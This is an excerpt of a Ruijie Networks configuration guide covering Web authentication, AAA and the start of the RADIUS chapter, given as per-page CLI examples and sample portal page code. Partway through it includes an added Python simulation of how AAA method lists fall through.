  • Page 668 Verification  Configure a customized URL.  Open the browser of a PC and access the Internet through the port without performing authentication.  Check whether the access requests are redirected and the parameters of the redirection URL are consistent with those of the customized URL.
  • Page 669 Configuration Steps Configure the plaintext IP address and MAC address of an STA, IP address of the NAS, SSID, URL, and other parameters as the redirection URL parameters. Ruijie(config.tmplt.eportalv2)# fmt custom encry none user-ip userip user-mac usermac mac-format none nas-ip nasip ssid ssid url firstu  Check whether the configuration is successful.
  • Page 670 Configuration Example  Configuring the Redirection HTTP Port  Configure port 8080 as the redirection HTTP port. Configuration Steps Ruijie(config)#http redirect port 8080  Verification Check whether the configuration is successful. Ruijie(config)#show web-auth rdport Rd-Port: 80 443 8080 1.4.16 Configuring Rate Limit Webauth Logging Configuration Effect ...
  • Page 671 Configuration Example  Configuring Rate Limit Webauth Logging  Configuration Disable rate limit Webauth Logging. Steps Ruijie(config)#web-auth logging enable 0  Check whether the configuration is successful. Verification Ruijie(config)#show running-config … web-auth logging enable 0 …...
  • Page 672: Scenario  A user occupies an HTTP session when performing authentication, and the other application programs of the user may also occupy HTTP sessions. For this reason, it is recommended that the maximum number of HTTP sessions for an unauthenticated user not be set to 1.
  • Page 673 Ruijie(config)#http redirect session-limit 3  Verification Check whether the configuration is successful. Ruijie(config)#show web-auth parameter HTTP redirection setting: session-limit: 3 timeout: Ruijie(config)# 1.4.18 Configuring the HTTP Redirection Timeout Configuration Effect  Configure the HTTP redirection timeout to maintain redirection connections. When an unauthenticated user tries to access network resources through HTTP, the TCP connection requests sent by the user will be intercepted and re-established with the NAS or convergence device.
  • Page 674 Usage Guide Configuration Example  Configuring the HTTP Redirection Timeout  Configuration Set the HTTP redirection timeout to 5s. Steps Ruijie(config)#http redirect timeout 5  Check whether the configuration is successful. Verification Ruijie(config)#show web-auth parameter HTTP redirection setting: session-limit: 255 timeout: 1.4.19 Configuring the Straight-Through Network Resources...
  • Page 675 To set authentication-exempted ARP resource, use the http redirect direct-arp command preferentially. Configuration Example  Configuring the Straight-Through Network Resources  Configuration Configure the straight-through network resources as 192.168.0.0/16. Steps Ruijie(config)#http redirect direct-site 192.168.0.0 255.255.0.0  Verification Check whether the configuration is successful. Ruijie(config)#show web-auth direct-site Direct sites: Address Mask...
  • Page 676 When ARP check or similar functions are enabled, the ARP learning performed by clients is controlled. As a result, clients cannot learn the ARPs of the gateway and other devices, which affects user experience. You can configure the straight-through ARP resource range to permit the ARP learning packets destined for the specified address to pass.
  • Page 677  Configure the straight-through ARP resource as 192.168.0.0/16. Configuration Steps Ruijie(config)#http redirect direct-arp 192.168.0.0 255.255.0.0  Verification Check whether the configuration is successful. Ruijie(config)#show web-auth direct-arp Direct arps: Address Mask --------------- --------------- 192.168.0.0 255.255.0.0 Ruijie(config)# 1.4.21 Configuring an Authentication-Exempted Address Range...
  • Page 678 After the port field is set, authentication exemption takes effect only on the configured interface. Configuration Example  Configuring an Authentication-Exempted Address Range  Configuration Configure an authentication-exempted address range. Steps Ruijie (config)# web-auth direct-host 192.168.197.64  Verification Check whether the configuration is successful. Ruijie(config)#show web-auth direct-host Direct hosts: Address Mask...
  • Page 679 NAS determines that the portal server is available. Because some servers or intermediate network segments filter ping packets, the first method is commonly used. The ping detection method is only used based on special requirements. In Ruijie First-Generation Web Authentication, the NAS connects to a port of the portal server...
  • Page 680: Scenario Only one of the two detection methods can be used at a time, to avoid conflicts. If both detection methods are configured, a detection algorithm conflict will occur or the detection results will be inaccurate.  The system automatically selects a detection method based on whether Ruijie First- or Second-Generation Web Authentication is used. Configuration Steps ...
  • Page 681 Configuration Example  Configuring Portal Detection  Configure portal detection. Configuration Steps Ruijie(config)#web-auth portal-check interval 20 timeout 2 retransmit 2  Check whether the configuration is successful. Verification Ruijie(config)#show running-config … web-auth portal-check interval 20 timeout 2 retransmit 2 …...
  • Page 682 If the nokick attribute is deleted, the system forces users offline. Configuration Example  Configuring Portal Escape  Configuration Configure portal escape. Steps Ruijie(config)#web-auth portal-escape  Verification Check whether the configuration is successful. Ruijie(config)#show running-config … web-auth portal-escape …...
  • Page 683  DHCP address check is supported only for IPv4.  DHCP address check is applicable only to Ruijie Second-Generation Web Authentication and iPortal Web Authentication.  The requirement that users obtain IP addresses through DHCP must be specified during network deployment. Those users cannot also use static IP addresses;...
  • Page 684  Enabling DHCP Address Check  Configuration Steps Enable DHCP address check. Ruijie(config)#web-auth dhcp-check  Verification Check whether the configuration is successful. Ruijie(config)#show running-config … web-auth dhcp-check … 1.4.26 Disabling Link Detection Configuration Effect ...
  • Page 685 1.4.27 Disabling Portal Extension Configuration Effect  Enable portal extension to support Ruijie portal server and portal servers that comply with the CMCC WLAN Service Portal Specification.  You can select multiple redirection URL formats when interworking with servers that comply with the CMCC WLAN Service Portal Specification to achieve compatibility with different servers.
  • Page 686  If the portal server is a product of Ruijie, use the default mode, that is, extension mode. If the portal server complies with the CMCC WLAN Service Portal Specification, disable portal extension.
  • Page 687  Check whether the configuration is successful. Verification Ruijie(config)#show running-config … no web-auth web-auth portal extension http redirect url-fmt ext1 … 1.4.28 Configuring a Whitelist and Blacklist Configuration Effect  Configure a whitelist to allow unauthenticated clients to access some network resources, and configure a blacklist to prevent authenticated clients from accessing some network resources.
  • Page 688 Configuration Example  Configuring a Whitelist and Blacklist  Configure a whitelist and blacklist. Configuration Steps Ruijie(config)#web-auth acl black-ip 192.168.1.2 Ruijie(config)#web-auth acl white-url www.ruijie.com.cn  Verification Check whether the configuration is successful. Ruijie(config)#show running-config … web-auth acl black-ip 192.168.1.2 web-auth acl white-url www.ruijie.com.cn...
  • Page 689: Scenario By default, they are not included. Configuration Example  Configuring Jitter-off Accounting  Configuration Steps Configure jitter-off accounting. Ruijie(config)#web-auth accounting jitter-off  Verification Check whether the configuration is successful. Ruijie(config)#show running-config … web-auth accounting jitter-off …...
  • Page 690  Configuring the Portal Communication Port  Configuration Configure an aggregate port as the portal communication port. Steps Ruijie(config)#ip portal source-interface Aggregateport 1 Verification  Check whether the configuration is successful. Ruijie(config)#show running-config ip portal source-interface Aggregateport 1 1.4.31 Configuring an NDKEY-Compatible Webauth URL Configuration Effect ...
  • Page 691 Check whether the configuration is successful. Ruijie(config)#show running-config … web-auth dkey-compatible url-parameter login 1.4.32 Enabling NAT for Ruijie iPortal Web Authentication Configuration Effect  Configure Ruijie iPortal Web Authentication to support NAT. Notes  NAT takes effect only in Ruijie iPortal Web Authentication. Configuration Steps...
  • Page 692 Command Global configuration mode Mode Usage Guide Verification  Check whether Ruijie iPortal Web Authentication can be implemented after NAT is enabled. Configuration Example  Enabling NAT for Ruijie iPortal Web Authentication Configuration  Enable NAT for Ruijie iPortal Web Authentication.
  • Page 693 … iportal retransmit 5 1.4.34 Configuring Service Selection in Ruijie iPortal Web Authentication Configuration Effect  Configure the service type used by Ruijie iPortal Web Authentication. Notes  Configuration Steps  Configuring the Service Type Used by Ruijie iPortal Web Authentication ...
  • Page 694 Configuration Example  Configuring a Service Type Configuration  Configure a service type. Steps Ruijie(config)#iportal service local local-srv Verification  Check whether the configuration is successful. Ruijie(config)#show running-config … iportal service local local-srv 1.4.35 Configuring the Accounting Method List of Web Authentication Configuration Effect ...
  • Page 695 Configuration Example  Configuring an Accounting Method Configuration  Configure an accounting method. Steps Ruijie(config.tmplt.eportalv2)#web-auth accounting v2 default Verification  Check whether the configuration is successful. Ruijie(config)#show running-config … web-auth accounting v2 default 1.4.36 Configuring a Web Authentication Method List Configuration Effect ...
  • Page 696: Scenario  Some NASs do not have a default page suite. When Ruijie iPortal Web Authentication is implemented, prepare a page suite in accordance with the relevant specification and import the page suite to the flash memory.
  • Page 697 Configuration Guide Configuring Web Authentication Page suite files: login.htm (login page); online.htm (online page, displayed when users pass authentication); offline.htm (offline page); login_mobile.htm (login page for mobile STAs); online_mobile.htm (online page for mobile STAs, displayed when users pass authentication); offline_mobile.htm (offline page for mobile STAs) ...
  • Page 698 Configuration Guide Configuring Web Authentication _errormsg.appendChild(script); //Call the init function when the login page is loaded. function init() { …… requestErrorMsg(); …… </script>  Form submission A form is submitted in the format of username=[AAAA]&password=[BBBB]&lang=[CCCC]. The meanings of the fields are described in the following: [AAAA]: (optional) Indicates the user name that the user enters in the User name text box.
  • Page 699 Configuration Guide Configuring Web Authentication script.src="errormessage"+location.search; _errormsg.appendChild(script); function init() { …… requestErrorMsg(); //Script that is executed when a user clicks the Login button function login() { document.getElementById('loginForm').action = "./login.htm"+location.search; document.getElementById('loginForm').submit(); window.onbeforeunload = null; window.onunload = null; …… </script> <body onload="init()"> <form method="post"...
  • Page 700 Configuration Guide Configuring Web Authentication </body> </html> The following figure shows the login page that the iPortal server pushes to users: The login page shows only the mandatory elements. Other functions can be added. For example, you can add a background and set the styles of page elements.
  • Page 701 Configuration Guide Configuring Web Authentication (Optional) Tab with the userip ID: displays the IP address of the online user. (Optional) Tab with the usermac ID: displays the MAC address of the online user. (Optional) Tab with the ssid ID: displays the SSID of the online user. (Optional) Tab with the availtime ID: displays the available time during which the user can access the Internet.
  • Page 702 Configuration Guide Configuring Web Authentication <script language="javascript"> //Obtain the information of the online user, including the user name, IP address, MAC address, and associated SSID of the online user, and available time. function requestOnlineInfo() { var _availTime=document.getElementById("availtime"); var script=document.createElement("script"); script.src="getonlineinfo"+location.search; _availTime.appendChild(script);...
  • Page 703 Configuration Guide Configuring Web Authentication <tr><td>MAC address:</td><td id="usermac"></td></tr> <tr><td>Associated SSID:</td><td id="ssid"></td></tr> <tr><td>Available time:</td><td id="availtime"></td></tr> </table> </body> </html> The following figure shows the online page that the iPortal server pushes to users: The online page shows only the mandatory elements. Other functions can be added. For example, you can add a background and set the styles of page elements.
  • Page 704 Configuration Guide Configuring Web Authentication var script=document.createElement("script"); script.src="getofflineinfo"+location.search; _timeused.appendChild(script); function init() { requestUserInfo(); </script> <body onload="init()"> …… </body> The HTML source code of the offline page is as follows: <html> <head> <title>Web authentication offline page</title> </head> <script language="javascript"> //Obtain the used time information. function requestOfflineInfo() { var _timeused=document.getElementById("timeused");...
  • Page 705 Configuration Guide Configuring Web Authentication </script> <body onload="init()"> Logout succeeded<br> <table> <tr><td>Used time:</td><td id="timeused"></td></tr> </table> </body> </html> The following figure shows the offline page that the iPortal server pushes to users: The offline page shows only the mandatory elements. Other functions can be added. For example, you can add a background and set the styles of page elements.
  • Page 706  Customizing a Page Suite  Configuration Customize a page suite. Steps Ruijie(config.tmplt.iportal)#page-suit ruijiepage  Verification Check whether the configuration is successful. Ruijie#show web-auth template Webauth Template Settings: ------------------------------------------------------------ Name: iportal Page-suit: ruijiepage Advertising url: default Advertising mode: online-popup Type:...
  • Page 707 Related Commands  Configuring the Resource Address of the Portal Server in Ruijie First-Generation Web Authentication Command http redirect homepage url url: Indicates the resource address of the ePortal server in Ruijie First-Generation Web Authentication. Parameter Description Command Global configuration mode...
  • Page 708 Mode Usage Guide In the 11.X version, the command is converted into web-auth enable <type>, in which type specifies the type (first or second generation) of Web authentication. The default type is Ruijie First-Generation Web Authentication.  Configuring the IP-Only Binding Mode...
  • Page 709 Configuring Ruijie First-Generation Web Authentication  Check that the NAS runs on the 10.X version and is configured with the IP address of the portal server Configuration used by Ruijie First-Generation Web Authentication. Steps Ruijie(config)# http redirect 192.168.197.64  Upgrade the NAS to 11.X.
  • Page 710: Scenario  Configuring Noise Reduction in Wireless Web Authentication Configuration  Set the parameters of noise reduction in wireless Web authentication. Steps Ruijie(config)#web-auth noise aging 1 hit 3 Verification  Check whether the configuration is successful. Ruijie(config)#show running-config 1.4.40 Enabling Automatic...
  • Page 711 Configuration Example  Enabling iOS Automatic Pop-up Window Control in WeChat-Based Authentication  Enable iOS automatic pop-up window control. Configuration Steps Ruijie(config)#http redirect adapter ios Verification  Check whether the configuration is successful. Ruijie(config)#show running-config … http redirect adapter ios 1.4.41 Enabling the Smart WeChat Web Authentication...
  • Page 712: Scenario  Enabling the Smart WeChat Web Authentication Configuration  Enable the smart WeChat Web authentication. Steps  The configuration is optional. Ruijie(config)#web-auth sta-perception enable Verification  Check whether the configuration is successful. Ruijie(config)#show running-config 1.4.42 Configuring User Detection Under WLANSEC Configuration Effect ...
  • Page 713 Configuration Example  Configuring User Detection Under WLANSEC Configuration  Set user detection under WLANSEC 1. Steps Ruijie(config)#wlansec 1 Ruijie(config-wlansec)#web-auth offline-detect interval 30 flow 10000...
  • Page 714: Scenario  Configuration Guide Configuring Web Authentication Verification  Check whether the configuration is successful. Ruijie(config)#show running-config | be wlansec 1 wlansec 1 web-auth offline-detect interval 30 flow 10000 … 1.4.43 Configuring Transparent Transmission of the 0x05 Attribute of the Portal Protocol Configuration Effect ...
  • Page 715  Configuring Transparent Transmission of the 0x05 Attribute of the Portal Protocol Configuration  Configure transparent transmission of the 0x05 attribute. Steps Ruijie(config)# web-auth portal-attribute 5 Ruijie(config)# web-auth portal-attribute textinfo Verification  Check whether the configuration is successful. Ruijie(config)#show running-config 1.4.44 Configuring Uniqueness Check of Portal Authentication Accounts...
  • Page 716 ErrCode 2-contained ACK_AUTH. Related Commands  Configuring Uniqueness Check of Portal Authentication Accounts Configuration  Configure uniqueness check of portal authentication accounts. Steps Ruijie(config)# web-auth portal-valid unique-name Verification  Check whether the configuration is successful. Ruijie(config)#show running-config 1.5 Monitoring Clearing Description Command Forces users offline.
  • Page 717 Configuration Guide Configuring Web Authentication Description Command Clears clear web-auth direct-host authentication-exempted users. Clears the Webauth blacklist and clear web-auth acl whitelist configuration. Displaying Description Command Displays the Webauth blacklist and show web-auth acl whitelist configuration. Displays the basic parameters of show web-auth parameter Web authentication.
  • Page 718 Configuration Guide Configuring Web Authentication Description Command Displays iPortal Webauth show web-auth local-portal information. Displays the Webauth portal check show web-auth portal-check information. Displays noise reduction show web-auth noise configuration of Web authentication. Debugging System resources are occupied when debugging information is output. Disable the debugging switch immediately after use.
  • Page 719 AAA is the most fundamental method of access control. Ruijie Networks also provides other simple access control functions, such as local username authentication and online password authentication. Compared to them, AAA offers a higher level of network security.
  • Page 720: Scenario  Configuration Guide Configuring AAA 2.2.1 Configuring AAA in a Single-Domain Environment Scenario In the network scenario shown in Figure 2-1, the following application requirements must be satisfied to improve the security management on the NAS: To facilitate account management and avoid information disclosure, each administrator has an individual account with a different username and password.
  • Page 721: Scenario  Scenario Configure the domain-based AAA service on the NAS.  A user can log in by entering the username PC1@ruijie.net or PC2@ruijie.com.cn and the correct password on an 802.1X client.  Permission management: Managed users are classified into Super User and Common User. Super users have the rights to view and configure the NAS, and common users are only able to view the NAS configuration.
  • Page 722 AAA service when the first method fails. On Ruijie devices, the first method in the list is tried first, and the next method is tried only if the previous one gives no response.
  • Page 723 Configuration Guide Configuring AAA request is denied. The Timeout response indicates that the security server fails to respond to the identity query. When detecting a timeout event, the AAA service proceeds to the next method in the list to continue the authentication process.
  • Page 724  AAA Authentication Types Ruijie products support the following authentication types:  Login authentication Users log in to the command line interface (CLI) of the NAS for authentication through Secure Shell (SSH), Telnet, and File Transfer Protocol (FTP).
  • Page 725 Configuration Guide Configuring AAA Before you configure an AAA authentication scheme, determine whether to use local authentication or remote server authentication. If the latter is to be implemented, configure a RADIUS or TACACS+ server in advance. If local authentication is selected, configure the local user database information on the NAS. ...
  • Page 726 Configuration Guide Configuring AAA After users access the Internet, the users are authorized to use the specific session services. For example, after users access the Internet through PPP and Serial Line Internet Protocol (SLIP), the users are authorized to use the data service, bandwidth, and timeout service.
  • Page 727 Configuration Guide Configuring AAA  EXEC accounting Accounting is performed when users log in to and out of the CLI of the NAS.  Command accounting Records are kept on the commands that users run on the CLI of the NAS. ...
  • Page 728 Configuration Guide Configuring AAA  Searches for the user domain according to the domain name.  Searches for the corresponding AAA method list name according to the domain configuration information on the NAS.  Searches for the corresponding method list according to the method list name. ...
  • Page 729 Configuration Guide Configuring AAA To display domain configuration, run the show aaa domain command. The system supports a maximum of 32 domains. 2.4 Configuration Configuration Description and Command Mandatory if user identities need to be verified. aaa new-model Enables AAA. aaa authentication login Defines a method list of login authentication.
  • Page 730 Configuration Guide Configuring AAA Configuration Description and Command aaa accounting network Defines a method list of network accounting. accounting exec Applies EXEC accounting methods to a specified VTY line. accounting commands Applies command accounting methods to a specified VTY line. Enables accounting update.
  • Page 731 Configuration Guide Configuring AAA  If an authentication scheme contains multiple authentication methods, these methods are executed according to the configured sequence.  The next authentication method is executed only when the current method does not respond. If the current method fails, the next method will be not tried.
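The fall-through rule stated on pages 722, 723 and 731 (a later method is consulted only when the earlier one gives no response; a reject is final) is easy to misread as "try local if RADIUS says no". The simulation below is an added example, not Ruijie code; the user databases, the "server reachable" flag and the list names mirroring `aaa authentication login list1 group radius local` and `aaa authorization network default group radius none` are all constructed for the demonstration.

```python
# Added example (not Ruijie code): a simulation of how an RGOS AAA method list is walked.
# A method is consulted only when the previous one returned no response; an explicit
# reject ends the walk. Users, method names and the "server down" flag are constructed.
from typing import Callable, Dict, List, Tuple

ACCEPT, REJECT, TIMEOUT = "ACCEPT", "REJECT", "TIMEOUT"
Method = Callable[[str, str], str]


def local_db(users: Dict[str, str]) -> Method:
    """'local': the NAS user database; it always answers."""
    def method(user: str, password: str) -> str:
        return ACCEPT if users.get(user) == password else REJECT
    return method


def radius_group(reachable: bool, users: Dict[str, str]) -> Method:
    """'group radius': an unreachable server yields no response after the retransmits."""
    def method(user: str, password: str) -> str:
        if not reachable:
            return TIMEOUT
        return ACCEPT if users.get(user) == password else REJECT
    return method


def method_none(user: str, password: str) -> str:
    """'none': no authentication at all; every request is accepted."""
    return ACCEPT


def authenticate(method_list: List[Tuple[str, Method]], user: str, password: str):
    """Walk the list the way the NAS does. Returns (result, trail), where trail records
    each method consulted and what it answered."""
    trail = []
    for name, method in method_list:
        answer = method(user, password)
        trail.append((name, answer))
        if answer != TIMEOUT:      # ACCEPT or REJECT is final; only no-response falls through
            return answer, trail
    return "FAIL", trail           # every method timed out: the login fails


# Constructed data: 'user' exists only in the local database, 'alice' only on the server.
LOCAL = {"user": "pass"}
SERVER = {"alice": "S3cret!"}

# aaa authentication login list1 group radius local  (server reachable / unreachable)
LIST1_UP = [("group radius", radius_group(True, SERVER)), ("local", local_db(LOCAL))]
LIST1_DOWN = [("group radius", radius_group(False, SERVER)), ("local", local_db(LOCAL))]
# aaa authorization network default group radius none  (same fall-through rule)
NONE_DOWN = [("group radius", radius_group(False, SERVER)), ("none", method_none)]


if __name__ == "__main__":
    for lst, label in ((LIST1_UP, "list1, server up"),
                       (LIST1_DOWN, "list1, server down"),
                       (NONE_DOWN, "group radius none, server down")):
        print(label, authenticate(lst, "user", "pass"))
```

Two consequences worth checking on a live NAS: while the RADIUS server is up, a local-only account such as `username user password pass` is rejected by `group radius local`, because the server's reject is final; and a list ending in `none` admits everyone as soon as the server stops answering, so it should only be placed last deliberately.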
  • Page 732 Configuration Guide Configuring AAA  This configuration is mandatory if you need to configure an Enable authentication method list. (You can configure only the default method list.)  By default, no method list of Enable authentication is configured.  Defining a Method List of 802.1X Authentication ...
  • Page 733 Enabling Local Account (username or subs) Sharing in Web and iPortal Authentication  (Optional) This configuration is supported only on EG products. This function is supported by default on other types of Ruijie products.  By default, a local account cannot be shared among multiple STAs.
  • Page 734 Configuration Guide Configuring AAA negotiation through AAA. Run the aaa authentication login command to configure the default or optional method lists for login authentication. In a method list, the next method is executed only when the current method does not receive response. After you configure login authentication methods, apply the methods to the VTY lines that require login authentication;...
  • Page 735 Configuration Guide Configuring AAA  Defining a Method List of PPP, Web, iPortal or SSL VPN Authentication Command aaa authentication { ppp | web-auth | iportal | sslvpn } { default | list-name } method1 [ method2...] Parameter ppp: Configures a method list of PPP authentication. Description web-auth: Configures a method list of Web authentication.
  • Page 736: Scenario  Ruijie#configure terminal Ruijie(config)#username user password pass Ruijie(config)#aaa new-model Ruijie(config)#radius-server host 10.1.1.1 Ruijie(config)#radius-server key ruijie Ruijie(config)#aaa authentication login list1 group radius local Ruijie(config)#line vty 0 20 Ruijie(config-line)#login authentication list1 Ruijie(config-line)#exit Verification Run the show aaa method-list command on the NAS to display the configuration.
  • Page 737: Scenario  You can define only one Enable authentication method list globally. You do not need to define the list name; just use default. After that, it will be applied automatically. Ruijie#configure terminal Ruijie(config)#username user privilege 15 password pass Ruijie(config)#enable secret w...
  • Page 738: Scenario  Configuration Guide Configuring AAA Ruijie(config)#aaa new-model Ruijie(config)#radius-server host 10.1.1.1 Ruijie(config)#radius-server key ruijie Ruijie(config)#aaa authentication enable default group radius local enable Verification Run the show aaa method-list command on the NAS to display the configuration. Ruijie#show aaa method-list Authentication method-list: aaa authentication enable default group radius local enable...
  • Page 739 Ruijie(config)#username user1 password pass1 Ruijie(config)#username user2 password pass2 Ruijie(config)#aaa new-model Ruijie(config)#radius-server host 10.1.1.1 Ruijie(config)#radius-server key ruijie Ruijie(config)#aaa authentication dot1x default group radius local Ruijie(config)#interface gigabitEthernet 0/1 Ruijie(config-if-gigabitEthernet 0/1)#dot1x port-control auto Ruijie(config-if-gigabitEthernet 0/1)#exit Verification Run the show aaa method-list command on the NAS to display the configuration.
  • Page 740 Configuration Guide Configuring AAA  EXEC authorization is often used with login authentication, which can be implemented on the same line. Authorization and authentication can be performed using different methods and servers. Therefore, the results of the same user may be different.
  • Page 741 Configuration Guide Configuring AAA  Applying EXEC Authorization Methods to a Specified VTY Line  Run the authorization exec command in line configuration mode to apply EXEC authorization methods to a specified VTY line.  This configuration is mandatory if you need to apply an EXEC authorization method list to a specified VTY line. ...
  • Page 742 Configuration Guide Configuring AAA method: Specifies authentication methods from local, none, and group. A method list contains up to four methods. local: Indicates that the local user database is used for EXEC authorization. none: Indicates that EXEC authorization is not performed. group: Indicates that a server group is used for EXEC authorization.
  • Page 743 Configuration Guide Configuring AAA TACACS+ server groups are supported. Command Global configuration mode Mode The RGOS supports authorization of network-related service requests such as PPP and SLIP requests. Usage Guide After authorization is configured, all authenticated users or interfaces are authorized automatically. You can configure three different authorization methods.
  • Page 744: Scenario  Ruijie(config)#username user password pass Ruijie(config)#username user privilege 6 Ruijie(config)#aaa new-model Ruijie(config)#radius-server host 10.1.1.1 Ruijie(config)#radius-server key test Ruijie(config)#aaa authentication login list1 group local Ruijie(config)#aaa authorization exec list2 group radius local Ruijie(config)#line vty 0 4 Ruijie(config-line)#login authentication list1 Ruijie(config-line)# authorization exec list2 Ruijie(config-line)#exit Verification Run the show run and show aaa method-list commands on the NAS to display the configuration.
  • Page 745: Scenario  Configuration Guide Configuring AAA Authorization method-list: aaa authorization exec list2 group radius local Ruijie# show running-config aaa new-model aaa authorization exec list2 group local aaa authentication login list1 group radius local username user password pass username user privilege 6 radius-server host 10.1.1.1...
  • Page 746 Ruijie(config)#aaa new-model Ruijie(config)#tacacs-server host 192.168.217.10 Ruijie(config)#tacacs-server key aaa Ruijie(config)#aaa authentication login default local Ruijie(config)#aaa authorization commands 15 default group tacacs+ local Ruijie(config)#aaa authorization console Verification Run the show run and show aaa method-list commands on the NAS to display the configuration.
  • Page 747: Scenario  Step 3: Configure an AAA authorization method list according to different access modes and service types. Step 4: Apply the configured method list to an interface or line. Skip this step if the default authorization method is used. Ruijie#configure terminal Ruijie(config)#aaa new-model Ruijie(config)#radius-server host 10.1.1.1 Ruijie(config)#radius-server key test...
  • Page 748 Configuration Guide Configuring AAA Ruijie(config)#aaa authorization network default group radius none Ruijie(config)# end Verification Run the show aaa method-list command on the NAS to display the configuration. Ruijie#show aaa method-list Authentication method-list: Accounting method-list: Authorization method-list: aaa authorization network default group radius none Common Errors 2.4.3 Configuring AAA Accounting...
  • Page 749 Configuration Guide Configuring AAA Command accounting  Only the TACACS+ protocol supports command accounting. Configuration Steps  Enabling AAA  Mandatory.  Run the aaa new-model command to enable AAA.  By default, AAA is disabled.  Defining a Method List of EXEC Accounting ...
  • Page 750 Configuration Guide Configuring AAA  Applying Command Accounting Methods to a Specified VTY Line  Run the accounting commands command in line configuration mode to apply command accounting methods to a specified VTY line.  This configuration is mandatory if you need to apply a command accounting method list to a specified VTY line. ...
  • Page 751 Configuration Guide Configuring AAA Parameter default: With this parameter used, the configured method list will be defaulted. Description list-name: Indicates the name of an EXEC accounting method list in characters. method: Indicates authentication methods from none and group. A method list contains up to four methods. none: Indicates that EXEC accounting is not performed.
  • Page 752 Configuration Guide Configuring AAA Description list-name: Indicates the name of a network accounting method list in characters. start-stop: Indicates that a start-accounting message and a stop-accounting message are sent when a user accesses a network and when the user disconnects from the network respectively. The start-accounting message indicates that the user is allowed to access the network, regardless of whether accounting is successfully enabled.
  • Page 753: Scenario  Ruijie#configure terminal Ruijie(config)#username user password pass Ruijie(config)#aaa new-model Ruijie(config)#radius-server host 10.1.1.1 Ruijie(config)#radius-server key test Ruijie(config)#aaa authentication login list1 group local Ruijie(config)#aaa accounting exec list3 start-stop group radius Ruijie(config)#line vty 0 4 Ruijie(config-line)#login authentication list1 Ruijie(config-line)# accounting exec list3 Ruijie(config-line)#exit Verification Run the show run and show aaa method-list commands on the NAS to display the configuration.
  • Page 754: Scenario  Step 2: Configure an AAA accounting method list according to different access modes and service types. Step 3: Apply the configured method list to an interface or line. Skip this step if the default accounting method is used. Ruijie#configure terminal Ruijie(config)#username user1 password pass1...
  • Page 755 Ruijie(config)#aaa new-model Ruijie(config)#tacacs-server host 192.168.217.10 Ruijie(config)#tacacs-server key aaa Ruijie(config)#aaa authentication login default local Ruijie(config)#aaa accounting commands 15 default start-stop group tacacs+ Verification Run the show aaa method-list command on the NAS to display the configuration. Ruijie#show aaa method-list Authentication method-list:...
  • Page 756: Scenario  Step 4: Apply the configured AAA accounting method list. Skip this step if the default accounting method is used. Accounting is performed only when 802.1X authentication is completed. Ruijie#configure terminal Ruijie(config)#username user password pass Ruijie(config)#aaa new-model Ruijie(config)#radius-server host 10.1.1.1 Ruijie(config)#radius-server key test Ruijie(config)#aaa authentication dot1x aut1x group radius local Ruijie(config)#aaa accounting network acc1x start-stop group radius...
  • Page 757 Configuration Guide Configuring AAA Ruijie(config)#dot1x authentication aut1x Ruijie(config)#dot1x accounting acc1x Ruijie(config)#interface gigabitEthernet 0/1 Ruijie(config-if-GigabitEthernet 0/1)#dot1x port-control auto Ruijie(config-if-GigabitEthernet 0/1)#exit Verification Run the show aaa method-list command on the NAS to display the configuration. Ruijie#show aaa method-list Authentication method-list: aaa authentication dot1x aut1x group radius local...
  • Page 758 Configuration Guide Configuring AAA  Mandatory.  Run the server command to add AAA server group members.  By default, a user-defined server group does not have servers.  Configuring the VRF Attribute of an AAA Server Group  Optional. ...
  • Page 759: Scenario  Step 2: Create user-defined AAA server groups. Steps Step 3: Add servers to the AAA server groups. Ruijie#configure terminal Ruijie(config)#radius-server host 10.1.1.1 Ruijie(config)#radius-server host 10.1.1.2 Ruijie(config)#radius-server host 10.1.1.3 Ruijie(config)#radius-server host 10.1.1.4 Ruijie(config)#radius-server key secret Ruijie(config)#aaa group server radius g1 Ruijie(config-gs-radius)#server 10.1.1.1 Ruijie(config-gs-radius)#server 10.1.1.2...
  • Page 760 Configuration Guide Configuring AAA Ruijie(config-gs-radius)#exit Ruijie(config)#aaa group server radius g2 Ruijie(config-gs-radius)#server 10.1.1.3 Ruijie(config-gs-radius)#server 10.1.1.4 Ruijie(config-gs-radius)#exit Verification Run the show aaa group and show run commands on the NAS to display the configuration. Ruijie#show aaa group Type Reference Name ---------- ---------- ----------...
  • Page 761 Configuration Guide Configuring AAA Common Errors  For RADIUS servers that use non-default authentication and accounting ports, when you run the server command to add servers, specify the authentication or accounting port.  Only the RADIUS server group can be configured with the VRF attribute. 2.4.5 Configuring the Domain-Based AAA Service Configuration Effect Create AAA schemes for 802.1X users in different domains.
  • Page 762 Configuration Guide Configuring AAA  Mandatory.  Run the aaa new-model command to enable AAA.  By default, AAA is disabled.  Enabling the Domain-Based AAA Service  Mandatory.  Run the aaa domain enable command to enable the domain-based AAA service. ...
  • Page 763 Configuration Guide Configuring AAA  Configuring Whether to Contain the Domain Name in Usernames  Optional.  By default, the usernames exchanged between the NAS and an authentication server carry domain information.  Configuring the Maximum Number of Domain Users ...
  • Page 764 Configuration Guide Configuring AAA configured domain name, the NAS uses the method list associated with this domain to provide the AAA service to the user. The system supports a maximum of 32 domains.  Associating the Domain with an 802.1X Authentication Method List Command authentication dot1x { default | list-name } Parameter...
  • Page 765: Scenario  Step 5: Associate the domain with the AAA method list. Step 6: Configure the domain attribute. Ruijie#configure terminal Ruijie(config)#aaa new-model Ruijie(config)#radius-server host 10.1.1.1 Ruijie(config)#radius-server key test Ruijie(config)#aaa authentication dot1x default group radius Ruijie(config)#aaa accounting network list3 start-stop group radius Ruijie(config)# aaa domain enable...
  • Page 766 Configuration Guide Configuring AAA Ruijie(config)# aaa domain domain.com Ruijie(config-aaa-domain)# authentication dot1x default Ruijie(config-aaa-domain)# accounting network list3 Ruijie(config-aaa-domain)# username-format without-domain Verification Run the show run and show aaa domain command on the NAS to display the configuration. Ruijie#show aaa domain domain.com =============Domain domain.com=============...
  • Page 767 Configuration Guide Configuring AAA aaa accounting network list3 start-stop group radius aaa authentication dot1x default group radius nfpp no service password-encryption radius-server host 10.1.1.1 radius-server key test line con 0 line vty 0 4 Common Errors 2.5 Monitoring Clearing Description Command Clears the locked users.
  • Page 768: Configuring RADIUS  Configuration Guide Configuring RADIUS 3 Configuring RADIUS 3.1 Overview The Remote Authentication Dial-In User Service (RADIUS) is a distributed client/server system. RADIUS works with Authentication, Authorization, and Accounting (AAA) to conduct identity authentication on users who attempt to access a network, to prevent unauthorized access. In the RGOS implementation, a RADIUS client runs on a device or Network Access Server (NAS) and transmits identity authentication requests to the central RADIUS server, where all user identity authentication information and network service information are stored.
